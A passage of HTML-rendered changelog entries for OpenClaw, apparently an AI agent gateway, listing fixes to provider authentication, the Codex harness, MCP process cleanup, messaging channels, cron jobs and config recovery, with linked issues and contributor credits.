<li>Models/auth: merge provider-owned default-model additions from <code>openclaw models auth login</code> instead of replacing <code>agents.defaults.models</code>, so re-authenticating an OAuth provider such as OpenAI Codex no longer wipes other providers' aliases and per-model params. Migrations that must rename keys (Anthropic -&gt; Claude CLI) opt in with <code>replaceDefaultModels</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4297616350" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69414" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69414/hovercard" href="https://github.com/openclaw/openclaw/issues/69414">#69414</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312958541" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70435" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70435/hovercard" href="https://github.com/openclaw/openclaw/pull/70435">#70435</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>Media understanding/audio: prefer configured or key-backed STT providers before auto-detected local Whisper CLIs, so installed local transcription tools no longer shadow API providers such as Groq/OpenAI in <code>tools.media.audio</code> auto mode. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289500766" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68727" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68727/hovercard" href="https://github.com/openclaw/openclaw/issues/68727">#68727</a>.</li>
<li>Providers/OpenAI: lock the auth picker wording for OpenAI API key, Codex browser login, and Codex device pairing so the setup choices no longer imply a mixed Codex/API-key auth path. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4278984500" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67848" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67848/hovercard" href="https://github.com/openclaw/openclaw/pull/67848">#67848</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tmlxrd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tmlxrd">@tmlxrd</a>.</li>
<li>Agents/BTW: route <code>/btw</code> side questions through provider stream registration with the session workspace, so Ollama provider URL construction and workspace-scoped hooks apply correctly. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285980114" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68336" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68336/hovercard" href="https://github.com/openclaw/openclaw/issues/68336">#68336</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312675764" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70413" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70413/hovercard" href="https://github.com/openclaw/openclaw/pull/70413">#70413</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/suboss87/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/suboss87">@suboss87</a>.</li>
<li>Agents/sessions: make session transcript write locks non-reentrant by default, so same-process transcript writers contend unless a helper explicitly opts into nested lock ownership.</li>
<li>ACPX/probe: expose an optional <code>probeAgent</code> plugin config field so the embedded ACP runtime health probe can target a configured agent (for example <code>opencode</code> or <code>claude</code>) instead of hardcoding <code>codex</code>, and stop marking the entire ACP runtime backend unavailable when the default probe agent is simply not installed or not authenticated. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4286722951" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68409" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68409/hovercard" href="https://github.com/openclaw/openclaw/issues/68409">#68409</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lyfuci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lyfuci">@lyfuci</a>.</li>
<li>Memory search: use sqlite-vec KNN for vector recall while preserving full post-filter result limits in multi-model indexes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4301781914" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69666" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69666/hovercard" href="https://github.com/openclaw/openclaw/issues/69666">#69666</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4302026419" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69680" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69680/hovercard" href="https://github.com/openclaw/openclaw/pull/69680">#69680</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/aalekh-sarvam/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/aalekh-sarvam">@aalekh-sarvam</a>.</li>
<li>Providers/OpenAI Codex: stop stale per-agent <code>openai-codex:default</code> OAuth profiles from shadowing a newer main-agent identity-scoped profile, and let <code>openclaw doctor</code> offer the matching cleanup. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312452938" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70393" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70393/hovercard" href="https://github.com/openclaw/openclaw/pull/70393">#70393</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>ACPX: route OpenClaw ACP bridge commands through the MCP-free runtime path even when the command is wrapped with <code>env</code>, has bridge flags, or is resumed from persisted session state, so documented <code>acpx openclaw</code> setups no longer fail on per-session MCP injection. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289592649" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68741" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68741/hovercard" href="https://github.com/openclaw/openclaw/pull/68741">#68741</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexlomt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexlomt">@alexlomt</a>.</li>
<li>Codex harness: route Codex-tagged MCP tool approval elicitations through OpenClaw plugin approvals, including current empty-schema app-server requests, while leaving generic user-input prompts fail-closed. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289840528" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68807" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68807/hovercard" href="https://github.com/openclaw/openclaw/pull/68807">#68807</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kesslerio/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kesslerio">@kesslerio</a>.</li>
<li>WhatsApp/outbound: hold an in-memory active-delivery claim while a live outbound send is in flight, so a concurrent reconnect drain no longer re-drives the same pending queue entry and duplicates cron sends 7-12x after the 30-minute inbound-silence watchdog fires mid-delivery. Crash-replay of fresh queue entries left behind by a dead process is preserved because the claim is intentionally process-local. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312357407" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70386" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70386/hovercard" href="https://github.com/openclaw/openclaw/issues/70386">#70386</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312817486" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70428" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70428/hovercard" href="https://github.com/openclaw/openclaw/pull/70428">#70428</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>Matrix/commands: keep Matrix DM allowlist state out of room control-command authorization, so trusted DM senders do not accidentally gain room-command access.</li>
<li>Providers/SDK retry: cap long <code>Retry-After</code> sleeps in Stainless-based Anthropic/OpenAI model SDKs so 60s+ retry windows surface immediately for OpenClaw failover instead of blocking the run. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4287340150" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68474" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68474/hovercard" href="https://github.com/openclaw/openclaw/pull/68474">#68474</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jetd1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jetd1">@jetd1</a>.</li>
<li>Agents/TTS: preserve spoken text in TTS tool results while defusing reply directives in transcript content, so future turns remember voice replies without treating spoken <code>MEDIA:</code> or voice tags as delivery metadata. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4290248648" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68869" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/68869/hovercard" href="https://github.com/openclaw/openclaw/pull/68869">#68869</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zqchris/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zqchris">@zqchris</a>.</li>
<li>Providers/OpenAI: harden Voice Call realtime transcription against OpenAI Realtime session-update drift, forward language and prompt hints, and add live coverage for realtime STT.</li>
<li>Agents/Pi embedded runs: suppress the "<g-emoji class="g-emoji" alias="warning">⚠️</g-emoji> Agent couldn't generate a response" warning when the assistant already delivered user-visible content through a messaging tool and the turn ended cleanly (<code>stopReason=stop</code>). Real failure modes (tool errors, provider <code>stopReason=error</code>, interrupted tool use) still surface the existing "verify before retrying" warning. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312503747" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70396" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70396/hovercard" href="https://github.com/openclaw/openclaw/issues/70396">#70396</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312782754" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70425" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70425/hovercard" href="https://github.com/openclaw/openclaw/pull/70425">#70425</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>Gateway/Linux: wrap gateway-managed supervisor, PTY, MCP stdio, and browser child processes in a tiny <code>/bin/sh</code> shim that raises the child's own <code>oom_score_adj</code> on Linux, so under cgroup memory pressure the kernel prefers transient workers over the long-lived gateway. Opt out with <code>OPENCLAW_CHILD_OOM_SCORE_ADJ=0</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312579153" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70404" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70404/hovercard" href="https://github.com/openclaw/openclaw/issues/70404">#70404</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312700658" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70419" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70419/hovercard" href="https://github.com/openclaw/openclaw/pull/70419">#70419</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/neeravmakwana/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/neeravmakwana">@neeravmakwana</a>.</li>
<li>Providers/Moonshot: stop strict-sanitizing Kimi's native tool_call IDs (shaped like <code>functions.&lt;name&gt;:&lt;index&gt;</code>) on the OpenAI-compatible transport, so multi-turn agentic flows through Kimi K2.6 no longer break after 2-3 tool-calling rounds when the serving layer fails to match mangled IDs against the original tool definitions. Adds a <code>sanitizeToolCallIds</code> opt-out to the shared <code>openai-compatible</code> replay family helper and wires Moonshot to it. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4215710532" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62319" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62319/hovercard" href="https://github.com/openclaw/openclaw/issues/62319">#62319</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307201991" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70030" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70030/hovercard" href="https://github.com/openclaw/openclaw/pull/70030">#70030</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LeoDu0314/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LeoDu0314">@LeoDu0314</a>.</li>
<li>Dependencies/security: override transitive <code>uuid</code> to <code>14.0.0</code>, clearing the runtime advisory across dependencies.</li>
<li>Codex harness: ignore dynamic tool descriptions when deciding whether to reuse a native app-server thread while still fingerprinting tool schemas, so channel-specific copy changes no longer reset otherwise compatible Codex conversations. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306655864" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69976" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69976/hovercard" href="https://github.com/openclaw/openclaw/pull/69976">#69976</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/chen-zhang-cs-code/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/chen-zhang-cs-code">@chen-zhang-cs-code</a>.</li>
<li>Codex harness: expose the Codex app-server model catalog in <code>models list/status</code>, avoid startup hangs from app-server discovery timeouts, and accept current Codex turn-completion notifications so Docker live gateway turns finish reliably.</li>
<li>Codex harness: drop invalid legacy app-server <code>serviceTier</code> values such as <code>"priority"</code> before native thread and turn requests, while keeping supported Codex tiers limited to <code>"fast"</code> and <code>"flex"</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4244622452" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64815" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64815/hovercard" href="https://github.com/openclaw/openclaw/issues/64815">#64815</a>.</li>
<li>Codex harness: show bounded, sanitized permission target samples in app-server approval prompts, so native permission requests keep their specific hosts, roots, and paths visible without leaking home usernames or URL credentials. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4311826695" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70340" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70340/hovercard" href="https://github.com/openclaw/openclaw/pull/70340">#70340</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lucenx9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lucenx9">@Lucenx9</a>.</li>
<li>Docs/Codex harness: narrow native compaction docs to the current start/completion signals, without promising a readable summary or kept-entry audit list yet. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4300717908" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69612" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69612/hovercard" href="https://github.com/openclaw/openclaw/pull/69612">#69612</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/91wan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/91wan">@91wan</a>.</li>
<li>Providers/Amazon Bedrock: use known context-window metadata for discovered models while keeping the unknown-model fallback conservative, so compaction and overflow handling improve for newer Bedrock models without overstating unlisted model limits. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wirjo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wirjo">@wirjo</a>.</li>
<li>Providers/Amazon Bedrock Mantle: refresh IAM-backed bearer tokens at runtime instead of baking discovery-time tokens into provider config, so long-lived Mantle sessions keep working after the initial token ages out. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wirjo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wirjo">@wirjo</a>.</li>
<li>Config/includes: write through single-file top-level includes for isolated OpenClaw-owned mutations, so <code>plugins install</code> and <code>plugins update</code> update an included <code>plugins.json5</code> file instead of flattening modular <code>$include</code> configs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4045603149" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41050" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41050/hovercard" href="https://github.com/openclaw/openclaw/issues/41050">#41050</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4256351856" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66048" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66048/hovercard" href="https://github.com/openclaw/openclaw/issues/66048">#66048</a>.</li>
<li>Config/reload: plan gateway reloads from source-authored config instead of runtime-materialized snapshots, so plugin update writes no longer trigger false restarts from derived provider/plugin config paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289512140" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68732" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68732/hovercard" href="https://github.com/openclaw/openclaw/issues/68732">#68732</a>.</li>
<li>Plugins/update: skip npm plugin reinstall/config rewrites when the installed version and recorded artifact identity already match the registry target, let bare npm package names resolve back to tracked install records, and point already-installed <code>plugins install</code> attempts at <code>plugins update</code> / <code>--force</code> instead of a hook-pack fallback. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077697849" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46955" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46955/hovercard" href="https://github.com/openclaw/openclaw/issues/46955">#46955</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4279995088" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67957" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/67957/hovercard" href="https://github.com/openclaw/openclaw/issues/67957">#67957</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4281906336" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68073" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68073/hovercard" href="https://github.com/openclaw/openclaw/issues/68073">#68073</a>.</li>
<li>Agents/MCP: keep <code>mcp.servers</code> and bundle MCP tools available in Pi embedded<br>
<code>coding</code> and <code>messaging</code> sessions while preserving <code>minimal</code> profile and<br>
<code>tools.deny: ["bundle-mcp"]</code> opt-out behavior. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4290317048" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68875" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68875/hovercard" href="https://github.com/openclaw/openclaw/issues/68875">#68875</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289915466" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68818" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68818/hovercard" href="https://github.com/openclaw/openclaw/issues/68818">#68818</a>.</li>
<li>Plugins/startup: tolerate transient bundled-channel catalog/metadata drift while auto-enabling configured plugins, so CLI and gateway startup no longer crash when a channel id is known but its display metadata is unavailable.</li>
<li>CLI/Claude: report CLI-backed reply runs as streaming while Claude/Codex CLI turns are still in flight, so WebChat keeps visible response state until the backend finishes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308362361" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70125" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70125/hovercard" href="https://github.com/openclaw/openclaw/issues/70125">#70125</a>.</li>
<li>Slack/streaming: fall back to normal Slack replies for Slack Connect streams rejected before the SDK flushes its local buffer, so short replies no longer disappear or report success before Slack acknowledges delivery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4310914101" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70295" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70295/hovercard" href="https://github.com/openclaw/openclaw/issues/70295">#70295</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312235692" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70370" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70370/hovercard" href="https://github.com/openclaw/openclaw/pull/70370">#70370</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mvanhorn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mvanhorn">@mvanhorn</a>.</li>
<li>Codex harness: rotate the shared app-server websocket client when the configured bearer token changes, so auth-token refreshes reconnect with the new <code>Authorization</code> header instead of reusing a stale socket. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4311551529" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70328" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70328/hovercard" href="https://github.com/openclaw/openclaw/pull/70328">#70328</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lucenx9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lucenx9">@Lucenx9</a>.</li>
<li>Channels/sandbox: derive runtime policy keys for external direct messages that share the main conversation, so sandbox/tool policy no longer treats channel-originated DMs as local main-session runs.</li>
<li>Config/models: merge provider-scoped model allowlist updates and protect model/provider map writes from accidental full replacement, adding <code>config set --merge</code> for additive updates and <code>--replace</code> for intentional clobbers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4254271525" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65920" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65920/hovercard" href="https://github.com/openclaw/openclaw/issues/65920">#65920</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4286636451" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68392" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68392/hovercard" href="https://github.com/openclaw/openclaw/issues/68392">#68392</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288719917" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68653" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68653/hovercard" href="https://github.com/openclaw/openclaw/issues/68653">#68653</a>.</li>
<li>Agents/Pi auth: preserve AWS SDK-authenticated Bedrock runs for IMDS and task-role setups, clear stale refresh timers on sentinel fallback, and log unexpected runtime-auth prep failures instead of silently leaving the provider unauthenticated. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wirjo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wirjo">@wirjo</a>.</li>
<li>Config/gateway: restore last-known-good config on critical clobber signatures such as missing metadata, missing <code>gateway.mode</code>, or sharp size drops, preventing gateway crash loops when a valid backup exists. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4311755818" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70336" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70336/hovercard" href="https://github.com/openclaw/openclaw/issues/70336">#70336</a>.</li>
<li>Config/gateway: recover configs accidentally prefixed with non-JSON output during gateway startup or <code>openclaw doctor --fix</code>, preserving the clobbered file as a backup while leaving normal config reads read-only.</li>
<li>Agents/GitHub Copilot: normalize connection-bound Responses item IDs in the Copilot provider wrapper so replayed histories no longer fail after the upstream connection changes. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4296485578" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69362" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/69362/hovercard" href="https://github.com/openclaw/openclaw/pull/69362">#69362</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Menci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Menci">@Menci</a>.</li>
<li>Pi embedded runs: pass real built-in tools into Pi session creation and then narrow active tool names after custom tool registration, so the runner and compaction paths compile cleanly and keep OpenClaw-managed custom tool allowlists without feeding string arrays into <code>createAgentSession</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/OpenAI websocket: route native OpenAI websocket metadata and session-header decisions through the shared endpoint classifier so local mocks and custom <code>models.providers.openai.baseUrl</code> endpoints stay out of the native OpenAI path consistently across embedded-runner and websocket transport code. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Cron/MCP: retire bundled MCP runtimes through one shared cleanup path for isolated cron run ends, persistent cron session rollover, and direct cron <code>deleteAfterRun</code> fallback cleanup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4292585400" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69145" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69145/hovercard" href="https://github.com/openclaw/openclaw/issues/69145">#69145</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288467340" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68623" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68623/hovercard" href="https://github.com/openclaw/openclaw/issues/68623">#68623</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289964600" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68827" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68827/hovercard" href="https://github.com/openclaw/openclaw/issues/68827">#68827</a>.</li>
<li>MCP/gateway: tear down stdio MCP process trees on transport close and dispose bundled MCP runtimes during session delete/reset, preventing orphaned wrapper/server processes from accumulating. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289852010" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68809" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68809/hovercard" href="https://github.com/openclaw/openclaw/issues/68809">#68809</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4298722957" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69465" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69465/hovercard" href="https://github.com/openclaw/openclaw/issues/69465">#69465</a>.</li>
<li>Agents/MCP: retire bundled MCP runtimes after completed one-shot subagent cleanup and nested <code>sessions_send</code> steps, while keeping persistent subagent sessions warm.</li>
<li>Config: render validation warnings with real line breaks instead of a literal <code>\n</code> sequence in CLI/audit output. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308623185" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70140" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70140/hovercard" href="https://github.com/openclaw/openclaw/issues/70140">#70140</a>.</li>
<li>Cron/doctor: repair malformed persisted cron job IDs through <code>openclaw doctor</code>, including legacy <code>jobId</code>, non-string <code>id</code>, and missing <code>id</code> rows, so <code>cron list</code> no longer needs display-layer coercion for corrupt store data. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4308387163" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70128" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70128/hovercard" href="https://github.com/openclaw/openclaw/issues/70128">#70128</a>.</li>
